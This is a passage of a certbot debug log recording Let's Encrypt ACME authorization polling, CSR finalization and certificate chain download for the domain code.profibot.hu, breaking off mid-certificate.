23:23:56,249:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:23:56 GMT +Content-Type: application/json +Content-Length: 824 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: LJ8hB_GODy_A5DkD3Bj8RtODYq6X_FONOXqb5IlVfuyXb8YuTOY +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "code.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-26T23:22:57Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/UdlK3A", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + } + ] +} +2026-01-19 23:23:56,249:DEBUG:acme.client:Storing nonce: LJ8hB_GODy_A5DkD3Bj8RtODYq6X_FONOXqb5IlVfuyXb8YuTOY +2026-01-19 23:23:56,250:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ', 'status': 'pending', 'token': 'OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk'} +2026-01-19 23:23:59,251:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:23:59,254:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJMSjhoQl9HT0R5X0E1RGtEM0JqOFJ0T0RZcTZYX0ZPTk9YcWI1SWxWZnV5WGI4WXVUT1kiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ1NzI3MzEwMDk2In0", + "signature": "kYEntwtsakB_Wj5vBV-FYeNkkftra0gSIIslx-uA0d04tJ8VJTnXsuTSMFaSIziPTsrxY2B04JB8azIfeX5TlkH2ryNfKi7SoylW7MqufETgt0PLuNLO_t441uWkorW3pLPhWVsYd8l5Lp44TW0FL9Ey9h4LJ_BzoI7WQzBuWNKrOdGt5G9CAjuhKg9lFzcVgo2myqEgko_B1PF7Ntfq3046Ge7ESBmU-71YQ75ZYMU7nGZVdDyglRlcyKubxhHK9pf7KSBqDS4VIKWw7nF_8U3n20wXV0s880qlNyF3xNOh5KtxPhxIU7zVch5_pCi0rx0JCfUwXKpTYeH1xEW6EA", + "payload": "" +} +2026-01-19 23:23:59,399:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/645727310096 HTTP/1.1" 200 824 +2026-01-19 23:23:59,400:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:23:59 GMT +Content-Type: application/json +Content-Length: 824 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: LJ8hB_GOFTomAL70X42Ai7kUXDH1lT4enIflHmt_c9s0aG80XDU +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "code.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-26T23:22:57Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/UdlK3A", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + } + ] +} +2026-01-19 23:23:59,400:DEBUG:acme.client:Storing nonce: LJ8hB_GOFTomAL70X42Ai7kUXDH1lT4enIflHmt_c9s0aG80XDU +2026-01-19 23:23:59,401:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ', 'status': 'pending', 'token': 'OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk'} +2026-01-19 23:24:02,402:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:24:02,406:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJMSjhoQl9HT0ZUb21BTDcwWDQyQWk3a1VYREgxbFQ0ZW5JZmxIbXRfYzlzMGFHODBYRFUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ1NzI3MzEwMDk2In0", + "signature": "Xk1B9KbJ5O51w1qmoIFjFqvi8qJvAazEpmavi6FSzr1a7HkUB56NKnxmkWlBxgi4rLMCGZQWpfryAnPI-5I82DIm8tWz4Wl3WzHQNir2uMBsIeLjqa6-O4wakOIVVxbZNTOoY1J0mjQY9uOy9rx_YLKKc-njmxkHK4ITwks7N9oBMXw4TTUkqPv5VyuY3qEiSLGuUlyLKLjaWe6uuaChgVfjsuUFYHbiYjn4_P5Y9SuncU8BnCCkJcEPEaRWDVSGOygrjuPlBzq2kZKuChiR2nFq6XPiN0rp5ZRS2v8PihA85TTllbsyf5VE4JkH0JKMk1rp1r30zQOx1zF8VvWN_g", + "payload": "" +} +2026-01-19 23:24:02,550:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/645727310096 HTTP/1.1" 200 769 +2026-01-19 23:24:02,551:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:24:02 GMT +Content-Type: application/json +Content-Length: 769 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: H6cLU6QyGQJu-3uliVlOsEpNxSJtob4_0Wu7OhUDHpHk13mTIXk +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "code.profibot.hu" + }, + "status": "valid", + "expires": "2026-02-18T23:23:59Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA", + "status": "valid", + "validated": "2026-01-19T23:22:58Z", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk", + "validationRecord": [ + { + "url": "http://code.profibot.hu/.well-known/acme-challenge/OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk", + "hostname": "code.profibot.hu", + "port": "80", + "addressesResolved": [ + "91.82.83.208" + ], + "addressUsed": "91.82.83.208" + } + ] + } + ] +} +2026-01-19 23:24:02,551:DEBUG:acme.client:Storing nonce: H6cLU6QyGQJu-3uliVlOsEpNxSJtob4_0Wu7OhUDHpHk13mTIXk +2026-01-19 23:24:02,552:DEBUG:certbot._internal.error_handler:Calling registered functions +2026-01-19 23:24:02,552:INFO:certbot._internal.auth_handler:Cleaning up challenges +2026-01-19 23:24:02,553:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk +2026-01-19 23:24:02,553:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up +2026-01-19 23:24:02,554:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE REQUEST-----\nMIIBJjCBrQIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAErDxNgjojpHc9JDAk\n0SKRrHzGUsCkyyvWhClaS9xHutZLnQzJMGtrKkiAecQu8HUzVr1TqThfmmSeLWL6\nWF0lY/84tsz0gtsJ1sjS61R+SI/nbJ3v91XqBHQiMHAPo60koC4wLAYJKoZIhvcN\nAQkOMR8wHTAbBgNVHREEFDASghBjb2RlLnByb2ZpYm90Lmh1MAoGCCqGSM49BAMC\nA2gAMGUCMB9YE/tvVAUzL5tryvQKSANR4AjNoxvxC5SOYeGc0157tBYR+YDIMMOP\nxHLSKOe+1QIxAM0tHr4FTMvmD8zIcXc1/EUAkTXnF/4dEJTHLIVmNYRkJFx9db7G\nRDOBgICf3UqEZQ==\n-----END CERTIFICATE REQUEST-----\n', form='pem') +2026-01-19 23:24:02,555:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2026-01-19 23:25:32.554980 +2026-01-19 23:24:02,555:DEBUG:acme.client:JWS payload: +b'{\n "csr": "MIIBJjCBrQIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAErDxNgjojpHc9JDAk0SKRrHzGUsCkyyvWhClaS9xHutZLnQzJMGtrKkiAecQu8HUzVr1TqThfmmSeLWL6WF0lY_84tsz0gtsJ1sjS61R-SI_nbJ3v91XqBHQiMHAPo60koC4wLAYJKoZIhvcNAQkOMR8wHTAbBgNVHREEFDASghBjb2RlLnByb2ZpYm90Lmh1MAoGCCqGSM49BAMCA2gAMGUCMB9YE_tvVAUzL5tryvQKSANR4AjNoxvxC5SOYeGc0157tBYR-YDIMMOPxHLSKOe-1QIxAM0tHr4FTMvmD8zIcXc1_EUAkTXnF_4dEJTHLIVmNYRkJFx9db7GRDOBgICf3UqEZQ"\n}' +2026-01-19 23:24:02,559:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/471340543716: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJINmNMVTZReUdRSnUtM3VsaVZsT3NFcE54U0p0b2I0XzBXdTdPaFVESHBIazEzbVRJWGsiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzI5MDY0MzgxNzYvNDcxMzQwNTQzNzE2In0", + "signature": "jzOIE6w2UtSDjMmxTXI561eq10uaJYu8ODx47Pa0Yrl2KkDRH4maZico3qLER8rRSP3exBwExuEp2pphl1qjrxaoZG4gxnFXT3hDxJnoIJCvSdkCq63D5Z3UUJ8vV2qjU7J3b4NKCJ3sb1Wsqz2eMZXekFwKbSj_HJEg06bdy2BEnjSKFQf2JuAX0iP5v-YxoD_XdVC5Sg4uOypZjad84O6ogpj_ZVWinbVk1LSlIUQW8S10XfLqq2z6Q5SUY9HsSzlgFpMuA3Xsrfr1_VFWX81ohFhSBR0-VD3Tc5gecOKHvTpOkmm0sVWN0gQzJmF8OkPKHFF4rMQvlam618Ux3Q", + "payload": "ewogICJjc3IiOiAiTUlJQkpqQ0JyUUlCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFckR4Tmdqb2pwSGM5SkRBazBTS1JySHpHVXNDa3l5dldoQ2xhUzl4SHV0WkxuUXpKTUd0cktraUFlY1F1OEhVelZyMVRxVGhmbW1TZUxXTDZXRjBsWV84NHRzejBndHNKMXNqUzYxUi1TSV9uYkozdjkxWHFCSFFpTUhBUG82MGtvQzR3TEFZSktvWklodmNOQVFrT01SOHdIVEFiQmdOVkhSRUVGREFTZ2hCamIyUmxMbkJ5YjJacFltOTBMbWgxTUFvR0NDcUdTTTQ5QkFNQ0EyZ0FNR1VDTUI5WUVfdHZWQVV6TDV0cnl2UUtTQU5SNEFqTm94dnhDNVNPWWVHYzAxNTd0QllSLVlESU1NT1B4SExTS09lLTFRSXhBTTB0SHI0RlRNdm1EOHpJY1hjMV9FVUFrVFhuRl80ZEVKVEhMSVZtTllSa0pGeDlkYjdHUkRPQmdJQ2YzVXFFWlEiCn0" +} +2026-01-19 23:24:04,944:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/2906438176/471340543716 HTTP/1.1" 200 452 +2026-01-19 23:24:04,945:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:24:04 GMT +Content-Type: application/json +Content-Length: 452 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/471340543716 +Replay-Nonce: H6cLU6Qypv3dO40vW5IdXJ0SaNxTFZKLV-htrTl5OXrpuWwoUA8 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "valid", + "expires": "2026-01-26T23:22:57Z", + "identifiers": [ + { + "type": "dns", + "value": "code.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/471340543716", + "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/066915db0d8c6c725fc46c163eb9f49ae7be" +} +2026-01-19 23:24:04,946:DEBUG:acme.client:Storing nonce: H6cLU6Qypv3dO40vW5IdXJ0SaNxTFZKLV-htrTl5OXrpuWwoUA8 +2026-01-19 23:24:05,947:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:24:05,950:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/2906438176/471340543716: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJINmNMVTZReXB2M2RPNDB2VzVJZFhKMFNhTnhURlpLTFYtaHRyVGw1T1hycHVXd29VQTgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzI5MDY0MzgxNzYvNDcxMzQwNTQzNzE2In0", + "signature": "VC_8pqdEkSOJ8hEzcps_ZJifOrLNpFeQpEnPmZpy8hWhZvQVxA9N72CnWq2FA_PbmEFK4uqfKLrLnB6EVm2R7_xTfD1dh4Jxe7uMJW5Zn8nihJKVUM1g4CTb7JZ0DM4msFoAcsWbYktiKJH9dN2lg9f9Tkge0hGB9YyD_Ca8sGNZQl0oH0j7ZDQGIUPMRlQOpzrQ-IQ1AIir_KV8DM3w5x7WuQKLtmjIcL0lEjlKaLDJx7BbTIt3sw-XWCkoRC4oh37lfeAMJrHzP-55xS345VX24p634XhJImJOQiKBd9D0AzsM4lQOdgq2Pd8QYvOohDNa27xQUuhNe5tnWNkUUw", + "payload": "" +} +2026-01-19 23:24:06,106:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/2906438176/471340543716 HTTP/1.1" 200 452 +2026-01-19 23:24:06,107:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:24:06 GMT +Content-Type: application/json +Content-Length: 452 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/471340543716 +Replay-Nonce: LJ8hB_GO6d5s4dK2eIxP0KygQOynEkG7fSMpQlga83oWOtYIeyM +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "valid", + "expires": "2026-01-26T23:22:57Z", + "identifiers": [ + { + "type": "dns", + "value": "code.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/471340543716", + "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/066915db0d8c6c725fc46c163eb9f49ae7be" +} +2026-01-19 23:24:06,108:DEBUG:acme.client:Storing nonce: LJ8hB_GO6d5s4dK2eIxP0KygQOynEkG7fSMpQlga83oWOtYIeyM +2026-01-19 23:24:06,108:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:24:06,112:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/066915db0d8c6c725fc46c163eb9f49ae7be: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJMSjhoQl9HTzZkNXM0ZEsyZUl4UDBLeWdRT3luRWtHN2ZTTXBRbGdhODNvV090WUlleU0iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDY2OTE1ZGIwZDhjNmM3MjVmYzQ2YzE2M2ViOWY0OWFlN2JlIn0", + "signature": "fzs37eev-CgZY9wuE-Glm_5RMjVHQrffx44YRxKT5v3zrvjH8d2HoZrWkvHG4QSSAy9Y-OHeRl3uvRKYgi1Fvowvt52xlqwpD1E7aJMgjtfgEKQ8ISex89ou49d_I4vXI6T-SqECxLvKhkPIVgxmhSAkXHdnfPuh7Vuimd_x5jzMmAgYZ6C-MKtkxhfAPY5sXLBAA0tlVXd2UywFYQpcY8n66ePjKzGG6z8tEQKt3A8xF_NGZWx15wfpJhjUK8hgs4lN1YIcNymHlFHYFD4_oj9CQ2LsS0FDLHH_qW1Il9RzY13vKOwD0kVkWEU0EvMW1aiV-32qEZAFplMk0oXoKQ", + "payload": "" +} +2026-01-19 23:24:06,284:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/066915db0d8c6c725fc46c163eb9f49ae7be HTTP/1.1" 200 2913 +2026-01-19 23:24:06,285:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:24:06 GMT +Content-Type: application/pem-certificate-chain +Content-Length: 2913 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="alternate" +Replay-Nonce: H6cLU6Qy_YKMbcycdtTSKF8t46hYS7U7Dylk3ffb1nMR8t8WdVw +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +-----BEGIN CERTIFICATE----- +MIIDtDCCAzqgAwIBAgISBmkV2w2MbHJfxGwWPrn0mue+MAoGCCqGSM49BAMDMDIx +CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF +ODAeFw0yNjAxMTkyMjI1MzJaFw0yNjA0MTkyMjI1MzFaMBsxGTAXBgNVBAMTEGNv +ZGUucHJvZmlib3QuaHUwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAASsPE2COiOkdz0k +MCTRIpGsfMZSwKTLK9aEKVpL3Ee61kudDMkwa2sqSIB5xC7wdTNWvVOpOF+aZJ4t +YvpYXSVj/zi2zPSC2wnWyNLrVH5Ij+dsne/3VeoEdCIwcA+jrSSjggIoMIICJDAO +BgNVHQ8BAf8EBAMCB4AwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwG +A1UdEwEB/wQCMAAwHQYDVR0OBBYEFJmpM2JIEFF0i4mlT394RM2hwG59MB8GA1Ud +IwQYMBaAFI8NE6L2Ln7RUGwzGDhdWY4jcpHKMDIGCCsGAQUFBwEBBCYwJDAiBggr +BgEFBQcwAoYWaHR0cDovL2U4LmkubGVuY3Iub3JnLzAbBgNVHREEFDASghBjb2Rl +LnByb2ZpYm90Lmh1MBMGA1UdIAQMMAowCAYGZ4EMAQIBMC0GA1UdHwQmMCQwIqAg +oB6GHGh0dHA6Ly9lOC5jLmxlbmNyLm9yZy82My5jcmwwggEOBgorBgEEAdZ5AgQC +BIH/BIH8APoAdwBkEcRspBLsp4kcogIuALyrTygH1B41J6vq/tUDyX3N8AAAAZvY +kpVyAAAEAwBIMEYCIQCtu3+le9jx12Df9gMli93P6z2yqK0e+1HmPtvoOc3tKwIh +AI//5jQe3jAgl3vBAD/dWn6DOCPf3/czz0W0gyZhCCNFAH8A4yON8o2iiOCq4Kzw ++pDJhfC2v/XSpSewAfwcRFjEtugAAAGb2JKYKwAIAAAFAC/n7DUEAwBIMEYCIQD2 +yKJ9EVEsYAZq9znoa2euJY0Kr1LKB3KMExhTRjGfCgIhANOZDKgSHDcaPg4D2tBi +vIe87PVD/6NrFrOMtOw9FrkIMAoGCCqGSM49BAMDA2gAMGUCMAVicdAlQJmbHtq1 +GKKwmFcOd10qoxkmtn2vjgalK8gmwFu4Yxz4PTrh65f/2uWXUwIxAJhDz1Dzy/jK +cA+/NqjqmSk3ZHT641YWVkExSKlwyVDCRciScnh0dtTAieWoQ0eGWQ== +-----END CERTIFICATE----- + +-----BEGIN CERTIFICATE----- +MIIEVjCCAj6gAwIBAgIQY5WTY8JOcIJxWRi/w9ftVjANBgkqhkiG9w0BAQsFADBP +MQswCQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFy +Y2ggR3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMTAeFw0yNDAzMTMwMDAwMDBa +Fw0yNzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBF +bmNyeXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7c +S7QMApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHb +R6EToMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB +9TAOBgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMB +MBIGA1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4j +cpHKMB8GA1UdIwQYMBaAFHm0WeZ7tuXkAXOACIjIGlj26ZtuMDIGCCsGAQUFBwEB +BCYwJDAiBggrBgEFBQcwAoYWaHR0cDovL3gxLmkubGVuY3Iub3JnLzATBgNVHSAE +DDAKMAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDEuYy5sZW5j +ci5vcmcvMA0GCSqGSIb3DQEBCwUAA4ICAQBnE0hGINKsCYWi0Xx1ygxD5qihEjZ0 +RI3tTZz1wuATH3ZwYPIp97kWEayanD1j0cDhIYzy4CkDo2jB8D5t0a6zZWzlr98d +AQFNh8uKJkIHdLShy+nUyeZxc5bNeMp1Lu0gSzE4McqfmNMvIpeiwWSYO9w82Ob8 +otvXcO2JUYi3svHIWRm3+707DUbL51XMcY2iZdlCq4Wa9nbuk3WTU4gr6LY8MzVA +aDQG2+4U3eJ6qUF10bBnR1uuVyDYs9RhrwucRVnfuDj29CMLTsplM5f5wSV5hUpm +Uwp/vV7M4w4aGunt74koX71n4EdagCsL/Yk5+mAQU0+tue0JOfAV/R6t1k+Xk9s2 +HMQFeoxppfzAVC04FdG9M+AC2JWxmFSt6BCuh3CEey3fE52Qrj9YM75rtvIjsm/1 +Hl+u//Wqxnu1ZQ4jpa+VpuZiGOlWrqSP9eogdOhCGisnyewWJwRQOqK16wiGyZeR +xs/Bekw65vwSIaVkBruPiTfMOo0Zh4gVa8/qJgMbJbyrwwG97z/PRgmLKCDl8z3d +tA0Z7qq7fta0Gl24uyuB05dqI5J1LvAzKuWdIjT1tP8qCoxSE/xpix8hX2dt3h+/ +jujUgFPFZ0EVZ0xSyBNRF3MboGZnYXFUxpNjTWPKpagDHJQmqrAcDmWJnMsFY3jS +u1igv3OefnWjSQ== +-----END CERTIFICATE----- + +2026-01-19 23:24:06,285:DEBUG:acme.client:Storing nonce: H6cLU6Qy_YKMbcycdtTSKF8t46hYS7U7Dylk3ffb1nMR8t8WdVw +2026-01-19 23:24:06,286:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:24:06,289:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/066915db0d8c6c725fc46c163eb9f49ae7be/1: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJINmNMVTZReV9ZS01iY3ljZHRUU0tGOHQ0NmhZUzdVN0R5bGszZmZiMW5NUjh0OFdkVnciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDY2OTE1ZGIwZDhjNmM3MjVmYzQ2YzE2M2ViOWY0OWFlN2JlLzEifQ", + "signature": "Y9O0qWzCrtQzEZnvanir2UM0wznZ_aBvYouB2P1X9Fd41VS2r41UHnH4ew2cFTARDS6eJc1IXP3UiSHKAsVRvLtLcsfMzlKqfqw1mkutfvxZBDiRJxuknWmrHGQgoVGn_SGrPvpRjkNdktWsYwOI91QkTRqko43XCnBxuEgAjOzvge-MrDSv7UUdLuFhkU8gFoaU35qQkTCtfslcXFAE8y-1jlJLYeEgDqM5NZUvyhcH414Q0G3J0RxS8hI3HAwclTdSTLwNlOGv50t2gfux3zSfJcfxcs9Ub4YvvnVu2Qj7GNtk4yCg-jwSl55F3zoQuBs_QrUwisfp-5p2RqgTyg", + "payload": "" +} +2026-01-19 23:24:06,438:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/066915db0d8c6c725fc46c163eb9f49ae7be/1 HTTP/1.1" 200 2348 +2026-01-19 23:24:06,438:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:24:06 GMT +Content-Type: application/pem-certificate-chain +Content-Length: 2348 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="alternate" +Replay-Nonce: LJ8hB_GOxyzCsUTWd8gXXz1WOid3nTkepYNA8rBsA_6kqlff818 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +-----BEGIN CERTIFICATE----- +MIIDtDCCAzqgAwIBAgISBmkV2w2MbHJfxGwWPrn0mue+MAoGCCqGSM49BAMDMDIx +CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF +ODAeFw0yNjAxMTkyMjI1MzJaFw0yNjA0MTkyMjI1MzFaMBsxGTAXBgNVBAMTEGNv +ZGUucHJvZmlib3QuaHUwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAASsPE2COiOkdz0k +MCTRIpGsfMZSwKTLK9aEKVpL3Ee61kudDMkwa2sqSIB5xC7wdTNWvVOpOF+aZJ4t +YvpYXSVj/zi2zPSC2wnWyNLrVH5Ij+dsne/3VeoEdCIwcA+jrSSjggIoMIICJDAO +BgNVHQ8BAf8EBAMCB4AwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwG +A1UdEwEB/wQCMAAwHQYDVR0OBBYEFJmpM2JIEFF0i4mlT394RM2hwG59MB8GA1Ud +IwQYMBaAFI8NE6L2Ln7RUGwzGDhdWY4jcpHKMDIGCCsGAQUFBwEBBCYwJDAiBggr +BgEFBQcwAoYWaHR0cDovL2U4LmkubGVuY3Iub3JnLzAbBgNVHREEFDASghBjb2Rl +LnByb2ZpYm90Lmh1MBMGA1UdIAQMMAowCAYGZ4EMAQIBMC0GA1UdHwQmMCQwIqAg +oB6GHGh0dHA6Ly9lOC5jLmxlbmNyLm9yZy82My5jcmwwggEOBgorBgEEAdZ5AgQC +BIH/BIH8APoAdwBkEcRspBLsp4kcogIuALyrTygH1B41J6vq/tUDyX3N8AAAAZvY +kpVyAAAEAwBIMEYCIQCtu3+le9jx12Df9gMli93P6z2yqK0e+1HmPtvoOc3tKwIh +AI//5jQe3jAgl3vBAD/dWn6DOCPf3/czz0W0gyZhCCNFAH8A4yON8o2iiOCq4Kzw ++pDJhfC2v/XSpSewAfwcRFjEtugAAAGb2JKYKwAIAAAFAC/n7DUEAwBIMEYCIQD2 +yKJ9EVEsYAZq9znoa2euJY0Kr1LKB3KMExhTRjGfCgIhANOZDKgSHDcaPg4D2tBi 